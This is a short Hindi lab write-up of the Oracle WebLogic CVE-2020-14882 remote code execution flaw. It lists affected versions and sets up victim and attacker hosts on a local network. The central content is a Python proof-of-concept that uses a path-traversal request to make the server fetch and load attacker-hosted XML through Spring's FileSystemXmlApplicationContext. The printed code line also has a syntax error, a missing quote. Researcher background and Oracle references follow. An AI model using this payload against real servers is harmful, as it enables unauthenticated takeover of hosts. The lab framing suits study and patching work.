
Oracle WebLogic Server का अधिग्रहण
CVE-2020-14882 Oracle WebLogic Server के Console घटक में एक दूरस्थ कोड निष्पादन (RCE) दोष है। यह प्रमाणीकरण-पूर्व दोष Oracle द्वारा हमले की जटिलता को "निम्न" और "आसानी से शोषणीय" के रूप में चिह्नित किया गया था, जिसके परिणामस्वरूप इसे 9.8 का महत्वपूर्ण CVSSv3 स्कोर दिया गया। सफल शोषण एक अप्रमाणित हमलावर को HTTP पर Oracle WebLogic सर्वर से समझौता करने और होस्ट का पूर्ण नियंत्रण लेने की अनुमति देगा। (और अधिक - Tenable)
प्रभावित समर्थित संस्करण हैं 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 और 14.1.1.0.0.
पीड़ित (WebLogic सर्वर): 192.168.0.15 - Windows 10 PRO जिसमें WebLogic सर्वर चल रहा है।
हमलावर (होस्टेड फ़ाइल XML): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
पेलोड:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
यह पेलोड spring framework XML लाइब्रेरी को कॉल करेगा ताकि हमलावर के डोमेन में एक सर्वर को अनुरोध भेज सके जो teste.xml फ़ाइल की खोज करे।
28 अक्टूबर को, जंग नामक एक सुरक्षा शोधकर्ता ने CVE-2020-14882 के बारे में एक ब्लॉग पोस्ट (वियतनामी में) प्रकाशित किया, जिसमें आंशिक विवरण शामिल थे जो PoC के लिए उपयोग किए जा सकते थे। जंग WebLogic दोषों से अपरिचित नहीं हैं, उन्हें CVE-2020-2555 की खोज और Oracle को रिपोर्ट करने का श्रेय दिया गया, जिसने जनवरी 2020 CPU में भेद्यता को पैच किया। मार्च में, जंग ने पुष्टि की कि CVE-2020-2555 पूरी तरह से ठीक नहीं हुआ था। CVE-2020-2555 के लिए बाईपास एक अन्य शोधकर्ता, VNPT सूचना सुरक्षा केंद्र (ISC) के Quynh Le द्वारा प्रकट किया गया था। Le और जंग दोनों को इस बाईपास की रिपोर्ट करने का श्रेय दिया गया, जिसे CVE-2020-2883 के रूप में पहचाना गया। (और अधिक - Tenable)
Oracle WebLogic: CVE-2020-14882 : क्रिटिकल पैच अपडेट (दस्तावेज़ आईडी 2771503.1)। (Oracle समर्थन)
Oracle क्रिटिकल पैच अपडेट सलाह - अक्टूबर 2020। (Oracle समर्थन)
CVE-2020-14882 Weblogic के प्रभाव को कम कैसे करें। (Oracle समर्थन)
Oracle Fusion Middleware के Oracle WebLogic सर्वर उत्पाद में भेद्यता। (Mitre - CVE)